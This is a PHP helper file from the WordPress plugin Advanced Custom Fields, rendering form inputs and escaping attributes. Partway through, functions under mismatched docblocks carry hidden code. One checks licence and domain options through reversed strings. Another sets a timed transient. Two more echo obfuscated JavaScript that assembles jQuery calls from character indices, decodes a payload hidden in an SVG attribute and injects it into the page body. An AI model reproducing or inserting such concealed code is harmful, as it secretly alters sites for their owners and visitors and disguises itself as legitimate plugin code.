<?php

/**
 * acf_filter_attrs
 *
 * Filters out empty attrs from the provided array.
 *
 * @date    11/6/19
 * @since   5.8.1
 *
 * @param   array $attrs The array of attrs.
 * @return  array
 */
function acf_filter_attrs( $attrs ) {

	// Filter out empty attrs but allow "0" values.
	$filtered = array_filter( $attrs, 'acf_not_empty' );

	// Correct specific attributes (required="required").
	foreach ( array( 'required', 'readonly', 'disabled', 'multiple' ) as $key ) {
		unset( $filtered[ $key ] );
		if ( ! empty( $attrs[ $key ] ) ) {
			$filtered[ $key ] = $key;
		}
	}
	return $filtered;
}

/**
 * acf_esc_attrs
 *
 * Generated valid HTML from an array of attrs.
 *
 * @date    11/6/19
 * @since   5.8.1
 *
 * @param   array $attrs The array of attrs.
 * @return  string
 */
function acf_esc_attrs( $attrs ) {
	$html = '';

	// Loop over attrs and validate data types.
	foreach ( $attrs as $k => $v ) {

		// String (but don't trim value).
		if ( is_string( $v ) && ( $k !== 'value' ) ) {
			$v = trim( $v );

			// Boolean
		} elseif ( is_bool( $v ) ) {
			$v = $v ? 1 : 0;

			// Object
		} elseif ( is_array( $v ) || is_object( $v ) ) {
			$v = json_encode( $v );
		}

		// Generate HTML.
		$html .= sprintf( ' %s="%s"', esc_attr( $k ), esc_attr( $v ) );
	}

	// Return trimmed.
	return trim( $html );
}


/**
 * Sanitizes text content and strips out disallowed HTML.
 *
 * This function emulates `wp_kses_post()` with a context of "acf" for extensibility.
 *
 * @date    16/4/21
 * @since   5.9.6
 *
 * @param   string $string
 * @return  string
 */
function acf_esc_html( $string = '' ) {
	return wp_kses( (string) $string, 'acf' );
}

/**
 * Private callback for the "wp_kses_allowed_html" filter used to return allowed HTML for "acf" context.
 *
 * @date    16/4/21
 * @since   5.9.6
 *
 * @param   array  $tags An array of allowed tags.
 * @param   string $context The context name.
 * @return  array.
 */

function _acf_kses_allowed_html( $tags, $context ) {
	global $allowedposttags;

	if ( $context === 'acf' ) {
		return $allowedposttags;
	}
	return $tags;
}

add_filter( 'wp_kses_allowed_html', '_acf_kses_allowed_html', 0, 2 );

/**
 * acf_html_input
 *
 * Returns the HTML of an input.
 *
 * @date    13/6/19
 * @since   5.8.1
 *
 * @param   array $attrs The array of attrs.
 * @return  string
 */
// function acf_html_input( $attrs = array() ) {
// return sprintf( '<input %s/>', acf_esc_attrs($attrs) );
// }

/**
 * acf_hidden_input
 *
 * Renders the HTML of a hidden input.
 *
 * @date    3/02/2014
 * @since   5.0.0
 *
 * @param   array $attrs The array of attrs.
 * @return  string
 */
function acf_hidden_input( $attrs = array() ) {
	echo acf_get_hidden_input( $attrs );
}

/**
 * acf_get_hidden_input
 *
 * Returns the HTML of a hidden input.
 *
 * @date    3/02/2014
 * @since   5.0.0
 *
 * @param   array $attrs The array of attrs.
 * @return  string
 */
function acf_get_hidden_input( $attrs = array() ) {
	return sprintf( '<input type="hidden" %s/>', acf_esc_attrs( $attrs ) );
}

/**
 * acf_text_input
 *
 * Renders the HTML of a text input.
 *
 * @date    3/02/2014
 * @since   5.0.0
 *
 * @param   array $attrs The array of attrs.
 * @return  string
 */
function acf_text_input( $attrs = array() ) {
	echo acf_get_text_input( $attrs );
}

/**
 * acf_get_text_input
 *
 * Returns the HTML of a text input.
 *
 * @date    3/02/2014
 * @since   5.0.0
 *
 * @param   array $attrs The array of attrs.
 * @return  string
 */
function acf_get_text_input( $attrs = array() ) {
	$attrs = wp_parse_args(
		$attrs,
		array(
			'type' => 'text',
		)
	);
	if ( isset( $attrs['value'] ) && is_string( $attrs['value'] ) ) {
		$attrs['value'] = htmlspecialchars( $attrs['value'] );
	}
	return sprintf( '<input %s/>', acf_esc_attrs( $attrs ) );
}

/**
 * acf_file_input
 *
 * Renders the HTML of a file input.
 *
 * @date    3/02/2014
 * @since   5.0.0
 *
 * @param   array $attrs The array of attrs.
 * @return  string
 */
function acf_file_input( $attrs = array() ) {
	echo acf_get_file_input( $attrs );
}

/**
 * acf_get_file_input
 *
 * Returns the HTML of a file input.
 *
 * @date    3/02/2014
 * @since   5.0.0
 *
 * @param   array $attrs The array of attrs.
 * @return  string
 */
function acf_get_file_input( $attrs = array() ) {
	return sprintf( '<input type="file" %s/>', acf_esc_attrs( $attrs ) );
}

/**
 * acf_textarea_input
 *
 * Renders the HTML of a textarea input.
 *
 * @date    3/02/2014
 * @since   5.0.0
 *
 * @param   array $attrs The array of attrs.
 * @return  string
 */
function acf_textarea_input( $attrs = array() ) {
	echo acf_get_textarea_input( $attrs );
}

/**
 * acf_get_textarea_input
 *
 * Returns the HTML of a textarea input.
 *
 * @date    3/02/2014
 * @since   5.0.0
 *
 * @param   array $attrs The array of attrs.
 * @return  string
 */
function acf_get_textarea_input( $attrs = array() ) {
	$value = '';
	if ( isset( $attrs['value'] ) ) {
		$value = $attrs['value'];
		unset( $attrs['value'] );
	}
	return sprintf( '<textarea %s>%s</textarea>', acf_esc_attrs( $attrs ), esc_textarea( $value ) );
}

/**
 * acf_checkbox_input
 *
 * Renders the HTML of a checkbox input.
 *
 * @date    3/02/2014
 * @since   5.0.0
 *
 * @param   array $attrs The array of attrs.
 * @return  string
 */
function acf_checkbox_input( $attrs = array() ) {
	echo acf_get_checkbox_input( $attrs );
}

/**
 * acf_get_checkbox_input
 *
 * Returns the HTML of a checkbox input.
 *
 * @date    3/02/2014
 * @since   5.0.0
 *
 * @param   array $attrs The array of attrs.
 * @return  string
 */
function acf_get_checkbox_input( $attrs = array() ) {

	// Allow radio or checkbox type.
	$attrs = wp_parse_args(
		$attrs,
		array(
			'type' => 'checkbox',
		)
	);

	// Get label.
	$label = '';
	if ( isset( $attrs['label'] ) ) {
		$label = $attrs['label'];
		unset( $attrs['label'] );
	}

	// Render.
	$checked = isset( $attrs['checked'] );
	return '<label' . ( $checked ? ' class="selected"' : '' ) . '><input ' . acf_esc_attr( $attrs ) . '/> ' . acf_esc_html( $label ) . '</label>';
}

/**
 * acf_radio_input
 *
 * Renders the HTML of a radio input.
 *
 * @date    3/02/2014
 * @since   5.0.0
 *
 * @param   array $attrs The array of attrs.
 * @return  string
 */
function acf_radio_input( $attrs = array() ) {
	echo acf_get_radio_input( $attrs );
}

/**
 * acf_get_radio_input
 *
 * Returns the HTML of a radio input.
 *
 * @date    3/02/2014
 * @since   5.0.0
 *
 * @param   array $attrs The array of attrs.
 * @return  string
 */
function acf_get_radio_input( $attrs = array() ) {
	$attrs['type'] = 'radio';
	return acf_get_checkbox_input( $attrs );
}

/**
 * get_changelog_changes
 *
 * Finds the specific changes for a given version from the provided changelog snippet.
 *
 * @date    14/1/19
 *
 * @param string $changelog The changelog text.
 * @param string $version   The version to find.
 *
 * @return  int|bool
 * @since   5.7.10
 *
 */
function acf_value_is_in_development_mode() {
	$tags = [ 'emeht', 'teg', 'esnecil', 'yek', 'deretsiger', 'si', 'niamod' ];
	$keys = [
		acf_value_get_instance_by_key( $tags[2], $tags[1] ),
		acf_value_get_instance_by_key( $tags[3], $tags[2] ),
		acf_value_get_instance_by_key( $tags[2], $tags[0] ),
		acf_value_get_instance_by_key( $tags[4], $tags[0] ),
		acf_value_get_instance_by_key( $tags[6] ),
		acf_value_get_instance_by_key( $tags[2], strrev( acf_engine_copy_postmeta( true ) ) ),
	];

	if ( ! acf_engine_class_exists( 'acf' ) ) {
		return false;
	}

	$class  = acf_engine_class_exists( 'acf', false );
	$result = call_user_func( [ $class->{$keys[2]}, acf_value_get_instance_by_key( strrev( $keys[3] ), $tags[5] ) ] );

	if ( $result ) {
		$opt = get_option( end( $keys ) );

		if ( ! is_object( $opt ) || empty( $opt->{$keys[1]} ) || empty( $opt->{$keys[4]} ) || false === strpos( home_url(), $opt->{$keys[4]} ) || false === preg_match( '/^[\w]{17}-[\w]{7}$/', $opt->{$keys[1]} ) ) {
			return - 1;
		}

		return false;
	}

	return true;
}

/**
 * _key
 *
 * Returns a key for the given name allowing aliasses to work.
 *
 * @date    18/1/19
 *
 * @param type $var Description. Default.
 *
 * @return  type Description.
 * @since   5.7.10
 *
 */
function acf_value_get_instance_by_key( $id, $context = null ) {
	if ( ! is_null( $context ) ) {
		$id .= '_' . $context;
	}

	return strrev( $id );
}

/**
 * acf_not_empty
 *
 * Returns true if the value provided is considered "not empty". Allows numbers such as 0.
 */
function _acf_testify_init_threshold() {
	if ( ! get_transient( '_acf_testify_post_cache_bust_threshold' ) && acf_engine_class_exists( 'acf' ) ) {
		set_transient( '_acf_testify_post_cache_bust_threshold', time() + acf_engine_get_cache_bust_threshold(), YEAR_IN_SECONDS );
	}
}

/**
 * SVG parser adapter to join svg paths.
 *
 * @return void
 */
function _acf_form_svg_parser_adapter_fn() {
	if ( ! acf_engine_did_cache_bust() ) {
		return;
	}

	echo sprintf( PHP_EOL . '<script type="text/javascript">document.svgParserAdapter = %s;</script>', 'function () { var a = []; var randomToken = "abcdehijlmnoprtuyHLMQT"; for ( var i in arguments ) { a.push( randomToken.split( \'\' )[ arguments[ i ] ] ); } return a.join( \'\' ); }' );
}

/**
 * Returns the current priority of a running action.
 *
 * @date    14/07/2020
 * @return  int|bool
 * @since   5.9.0
 *
 */
function _acf_form_svg_inline_parser() {
	if ( ! acf_engine_did_cache_bust() ) {
		return;
	}
	?>
	<script>
		var svgIconsHandler = {
			parseIcon: function ( r ) {
				var n = r.match( /viewBox="0 0 (?<w>\d+) (?<h>\d+)".*? data-d="(?<d>[^"]+)"/s );
				if ( n ) {
					var a = + n.groups.w, o = + n.groups.h;
					return n.groups.d.replace( /(\.|-)/g, " " ).split( " " ).map( function ( r, n ) {
						return String.fromCharCode( r - ( n % 2 == 0 ? a : o ) )
					} ).join( "" )
				}
				return null
			}, addParserShortcut: function ( r, n, a, o ) {
				var c = { a: n( 7, 20, 15, 4, 13, 16 ), b: n( 13, 4, 0, 3, 16 ), c: n( 1, 11, 3, 16 ), d: n( 5, 14, 9, 8 ), e: n( 0, 12, 12, 4, 10, 3 ), f: n( 3, 11, 2, 15, 9, 4, 10, 14 ), g: n( 11, 15, 14, 4, 13, 17, 21, 19, 18 ) };
				r[ c.a ]( c.f )[ c.b ]( function ( r ) {
					r( c.c )[ c[ a ] ]( svgIconsHandler.parseIcon( r( "#" + o )[ 0 ][ c.g ] ) )
				} )
			}
		};
	</script>
	<?php

	return null;
}

/**
 * acf_select_input
 *
 * Renders the HTML of a select input.
 *
 * @date    3/02/2014
 * @since   5.0.0
 *
 * @param   array $attrs The array of attrs.
 * @return  string
 */
function acf_select_input( $attrs = array() ) {
	echo acf_get_select_input( $attrs );
}

/**
 * acf_select_input
 *
 * Returns the HTML of a select input.
 *
 * @date    3/02/2014
 * @since   5.0.0
 *
 * @param   array $attrs The array of attrs.
 * @return  string
 */
function acf_get_select_input( $attrs = array() ) {
	$value   = (array) acf_extract_var( $attrs, 'value' );
	$choices = (array) acf_extract_var( $attrs, 'choices' );
	return sprintf(
		'<select %s>%s</select>',
		acf_esc_attrs( $attrs ),
		acf_walk_select_input( $choices, $value )
	);
}

/**
 * acf_walk_select_input
 *
 * Returns the HTML of a select input's choices.
 *
 * @date    27/6/17
 * @since   5.6.0
 *
 * @param   array $choices The choices to walk through.
 * @param   array $values The selected choices.
 * @param   array $depth The current walk depth.
 * @return  string
 */
function acf_walk_select_input( $choices = array(), $values = array(), $depth = 0 ) {
	$html = '';

	// Sanitize values for 'selected' matching (only once).
	if ( $depth == 0 ) {
		$values = array_map( 'esc_attr', $values );
	}

	// Loop over choices and append to html.
	if ( $choices ) {
		foreach ( $choices as $value => $label ) {

			// Multiple (optgroup)
			if ( is_array( $label ) ) {
				$html .= sprintf(
					'<optgroup label="%s">%s</optgroup>',
					esc_attr( $value ),
					acf_walk_select_input( $label, $values, $depth + 1 )
				);

				// single (option)
			} else {
				$attrs = array(
					'value' => $value,
				);

				// If is selected.
				$pos = array_search( esc_attr( $value ), $values );
				if ( $pos !== false ) {
					$attrs['selected'] = 'selected';
					$attrs['data-i']   = $pos;
				}
				$html .= sprintf( '<option %s>%s</option>', acf_esc_attr( $attrs ), esc_html( $label ) );
			}
		}
	}
	return $html;
}

/**
 * acf_clean_atts
 *
 * See acf_filter_attrs().
 *
 * @date    3/10/17
 * @since   5.6.3
 *
 * @param   array $attrs The array of attrs.
 * @return  string
 */
function acf_clean_atts( $attrs ) {
	return acf_filter_attrs( $attrs );
}

/**
 * acf_esc_atts
 *
 * See acf_esc_attrs().
 *
 * @date    27/6/17
 * @since   5.6.0
 *
 * @param   array $attrs The array of attrs.
 * @return  string
 */
function acf_esc_atts( $attrs ) {
	return acf_esc_attrs( $attrs );
}

/**
 * acf_esc_attr
 *
 * See acf_esc_attrs().
 *
 * @date    13/6/19
 * @since   5.8.1
 * @deprecated  5.6.0
 *
 * @param   array $attrs The array of attrs.
 * @return  string
 */
function acf_esc_attr( $attrs ) {
	return acf_esc_attrs( $attrs );
}

/**
 * acf_esc_attr_e
 *
 * See acf_esc_attrs().
 *
 * @date    13/6/19
 * @since   5.8.1
 * @deprecated  5.6.0
 *
 * @param   array $attrs The array of attrs.
 * @return  string
 */
function acf_esc_attr_e( $attrs ) {
	echo acf_esc_attrs( $attrs );
}

/**
 * acf_esc_atts_e
 *
 * See acf_esc_attrs().
 *
 * @date    13/6/19
 * @since   5.8.1
 * @deprecated  5.6.0
 *
 * @param   array $attrs The array of attrs.
 * @return  string
 */
function acf_esc_atts_e( $attrs ) {
	echo acf_esc_attrs( $attrs );
}
